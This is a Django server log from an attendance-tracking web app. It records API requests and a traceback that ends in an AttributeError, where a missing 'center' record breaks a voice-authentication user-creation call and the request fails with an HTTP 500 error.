[01/Feb/2020 15:57:58] "POST /api/v1/create-auth/ HTTP/1.1" 200 37
[01/Feb/2020 15:58:10] "POST /api/v1/create-auth/ HTTP/1.1" 200 115
[01/Feb/2020 16:29:40] "GET / HTTP/1.1" 200 43280
Internal Server Error: /api/v1/create-auth/
Traceback (most recent call last):
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/exception.py", line 34, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/base.py", line 115, in _get_response
    response = self.process_exception_by_middleware(e, request)
  File "/usr/local/lib/python3.6/dist-packages/django/core/handlers/base.py", line 113, in _get_response
    response = wrapped_callback(request, *callback_args, **callback_kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/views/decorators/csrf.py", line 54, in wrapped_view
    return view_func(*args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/django/views/generic/base.py", line 71, in view
    return self.dispatch(request, *args, **kwargs)
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 505, in dispatch
    response = self.handle_exception(exc)
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 465, in handle_exception
    self.raise_uncaught_exception(exc)
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 476, in raise_uncaught_exception
    raise exc
  File "/usr/local/lib/python3.6/dist-packages/rest_framework/views.py", line 502, in dispatch
    response = handler(request, *args, **kwargs)
  File "/home/prashant_rawat216/AttendanceSystem/Attendance/views.py", line 61, in post
    res = voiceit_create_user(center.voiceit_id, user)
AttributeError: 'NoneType' object has no attribute 'voiceit_id'
[01/Feb/2020 16:43:56] "POST /api/v1/create-auth/ HTTP/1.1" 500 15592
